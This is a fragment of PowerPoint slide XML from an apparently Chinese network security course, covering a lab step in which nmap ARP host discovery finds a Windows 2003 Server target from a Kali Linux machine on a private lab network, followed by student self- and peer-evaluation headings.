                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="52" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="53" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="55" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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p:bldP spid="81" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="82" grpId="0" bldLvl="0" animBg="1"/>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a:xfrm>
            <a:off x="533756" y="1946091"/>
            <a:ext cx="4302496" cy="638783"/>
            <a:chOff x="6627851" y="1754191"/>
            <a:chExt cx="4302496" cy="638783"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="2086269"/>
              <a:ext cx="3636897" cy="306705"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行ARP的主机发现并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 570"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="1754191"/>
              <a:ext cx="936625" cy="368300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>步骤一 </a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="文本框 106"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5319395" y="310198"/>
            <a:ext cx="5080000" cy="1753235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>4.上述回显结果中的“Host is up”说明有主机存活，其中“192.168.172.128”是操作机Kali Linux系统的IP地址。因此，扫描到的目标主机的IP地址为“192.168.172.129”。在目标主机Windows 2003 Server中使用“ipconfig -all”查看验证可知，情况属实，如图2-2-4所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5319395" y="2063433"/>
            <a:ext cx="5276850" cy="4229100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="文本框 107"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5319395" y="6292533"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-4 查验目标机的IP地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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a:xfrm>
            <a:off x="533756" y="1971129"/>
            <a:ext cx="4302496" cy="521035"/>
            <a:chOff x="6627851" y="1871939"/>
            <a:chExt cx="4302496" cy="521035"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="2086269"/>
              <a:ext cx="3636897" cy="306705"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 570"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7274400" y="1887541"/>
              <a:ext cx="1402080" cy="460375"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>学生自评</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="533756" y="3513239"/>
            <a:ext cx="4302496" cy="524299"/>
            <a:chOff x="6627851" y="3492048"/>
            <a:chExt cx="4302496" cy="524597"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3709766"/>
              <a:ext cx="3636897" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3492048"/>
              <a:ext cx="1402080" cy="460637"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>学生互评</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="组合 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="562331" y="4955527"/>
            <a:ext cx="4302496" cy="525366"/>
            <a:chOff x="6627851" y="5163977"/>
            <a:chExt cx="4302496" cy="525665"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="矩形: 圆角 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="5163977"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="5382763"/>
